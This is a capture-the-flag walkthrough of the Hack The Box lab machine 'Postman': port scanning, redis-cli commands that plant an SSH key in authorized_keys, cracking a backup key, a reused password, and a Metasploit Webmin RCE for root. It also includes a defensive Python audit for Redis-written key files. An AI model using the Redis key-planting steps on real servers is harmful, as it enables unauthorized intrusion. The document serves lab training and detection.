This post documents the complete walkthrough of Postman, a retired vulnerable VM created by TheCyberGeek, and hosted at Hack The Box. If you are uncomfortable with spoilers, please stop reading now.

Postman is a retired vulnerable VM from Hack The Box.

Information Gathering

Let’s start with a masscan probe to establish the open ports in the host.

# masscan -e tun0 -p1-65535,U:1-65535 --rate=1000

Starting masscan 1.0.5 ( at 2019-11-03 13:51:36 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 10000/tcp on
Discovered open port 6379/tcp on
Discovered open port 80/tcp on
Discovered open port 22/tcp on

Interesting list of open ports. Let’s do one better with nmap scanning the discovered ports to establish their services.

# nmap -n -v -Pn -p22,80,6379,10000 -A --reason -oN nmap.txt
22/tcp    open  ssh     syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 46:83:4f:f1:38:61:c0:1c:74:cb:b5:d1:4a:68:4d:77 (RSA)
|   256 2d:8d:27:d2:df:15:1a:31:53:05:fb:ff:f0:62:26:89 (ECDSA)
|_  256 ca:7c:82:aa:5a:d3:72:ca:8b:8a:38:3a:80:41:a0:45 (ED25519)
80/tcp    open  http    syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: E234E3E8040EFB1ACD7028330A956EBF
| http-methods:
|_  Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: The Cyber Geek's Personal Website
6379/tcp  open  redis   syn-ack ttl 63 Redis key-value store 4.0.9
10000/tcp open  http    syn-ack ttl 63 MiniServ 1.910 (Webmin httpd)
|_http-favicon: Unknown favicon MD5: 91549383E709F4F1DD6C8DAB07890301
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).

Hmm. Other than the usual ssh and http services, we also have Redis and MiniServ running. Anyhow, this is what the http site looks like.

Redis SSH Backdoor

Anyway, since the Redis service is available, let’s check and see what we can glean from there.

Interesting. The creator seems to be suggesting that there’s a redis SSH account and the way to get a foothold is to dump an SSH public key we control to authorized_keys.

That should be easy.

  1. ssh-keygen -f redis
  2. echo -ne "\n\n" > public; cat >> public
  3. redis-cli -h SLAVEOF NO ONE
  4. cat public | redis-cli -h -x set pub
  5. redis-cli -h CONFIG SET dbfilename authorized_keys
  6. redis-cli -h SAVE

I’ve incorporated the above steps into a script to save a bit of time because many HTB players are chasing after a Metasploit exploit that somehow didn’t work as expected.
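From the defender’s side, the trick above leaves a distinctive trace: the authorized_keys file is no longer a text file but a Redis RDB dump with the key padded inside it, and sshd simply skips the lines it cannot parse. The following audit is an added example, not part of the original writeup; the audited paths and the sample dump (built to mimic the Redis 4.0 RDB v8 layout) are my own assumptions.

```python
"""Spot an authorized_keys file that Redis has overwritten with an RDB dump
(the CONFIG SET dir/dbfilename + SAVE technique). sshd skips lines it cannot
parse, so the binary RDB framing around the planted key is silently tolerated;
this audit surfaces it. Added example; paths and sample data are assumptions."""
import glob
import re

RDB_MAGIC = b"REDIS00"  # every RDB file starts with "REDIS" + a 4-digit version
# Heuristic: a legitimate entry carries "<type> <base64>" somewhere on the line
# (optionally after options such as command="..." or from="...").
KEY_LINE = re.compile(
    rb"(?:^|\s)(?:ssh-(?:rsa|ed25519|dss)|ecdsa-sha2-nistp\d+|sk-\S+@openssh\.com)"
    rb"\s+[A-Za-z0-9+/]+={0,3}(?:\s|$)")


def audit_authorized_keys(data: bytes) -> dict:
    """Classify each line; anything that is neither blank, a comment nor a key
    entry is junk, and junk or an RDB header means the file was not written
    by an administrator."""
    key_lines = junk_lines = 0
    for raw in data.split(b"\n"):
        line = raw.strip(b"\r")
        if not line.strip() or line.lstrip().startswith(b"#"):
            continue
        if KEY_LINE.search(line):
            key_lines += 1
        else:
            junk_lines += 1
    rdb_header = data.startswith(RDB_MAGIC)
    return {"rdb_header": rdb_header, "key_lines": key_lines,
            "junk_lines": junk_lines, "suspicious": rdb_header or junk_lines > 0}


def build_sample_dump(pubkey_line: bytes) -> bytes:
    """Constructed sample: what SAVE writes for a single key "pub" whose value
    is the padded public key, laid out like a Redis 4.0 (RDB v8) file."""
    def rdb_len(n: int) -> bytes:  # RDB length encoding: 6-bit or 14-bit form
        return bytes([n]) if n < 64 else bytes([0x40 | (n >> 8), n & 0xFF])

    def rdb_str(s: bytes) -> bytes:
        return rdb_len(len(s)) + s
    return (RDB_MAGIC + b"08"
            + b"\xfa" + rdb_str(b"redis-ver") + rdb_str(b"4.0.9")  # aux field
            + b"\xfe" + rdb_len(0)                                 # SELECT db 0
            + b"\xfb" + rdb_len(1) + rdb_len(0)                    # resizedb hint
            + b"\x00" + rdb_str(b"pub") + rdb_str(b"\n\n" + pubkey_line + b"\n\n")
            + b"\xff" + b"\x00" * 8)                               # EOF, checksum off


if __name__ == "__main__":  # assumed locations of authorized_keys on a Linux host
    for path in glob.glob("/home/*/.ssh/authorized_keys") + glob.glob("/root/.ssh/authorized_keys"):
        with open(path, "rb") as fh:
            print(path, audit_authorized_keys(fh.read()))
```

A file that trips `suspicious` should be compared against the RDB dir and dbfilename currently set in Redis, and the Redis instance itself should be bound to localhost, protected with `requirepass`, or have `CONFIG` renamed.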

Matt’s Backup SSH Key

During enumeration of redis’s account, I noticed that there is another account with UID 1000 (Matt). That would mean that the file user.txt is in Matt’s home directory.

Look what we found!

Matt is careless to leave a backup of his password-protected SSH private key around.

Something else is up. Notice that Matt cannot login via SSH.

What good is a password-protected private key if we can’t login via SSH? Well, we can crack the key’s password and see what it brings us.

And guess what. We can su as Matt with that password.

There you have it. The file user.txt is indeed in Matt’s home directory.

Privilege Escalation

During enumeration of Matt’s account, I noticed the presence of a file in /etc/webmin/Matt.acl, which sort of gave me an idea—maybe Matt is able to log in to the Webmin using the same credential (Matt:computer2008)?

No shit.

Webmin 1.910 - ‘Package Updates’ Remote Command Execution

Long story short. As much as I wanted to avoid Metasploit, this is one exploit that executes better with it.

This is way too easy.

Getting root.txt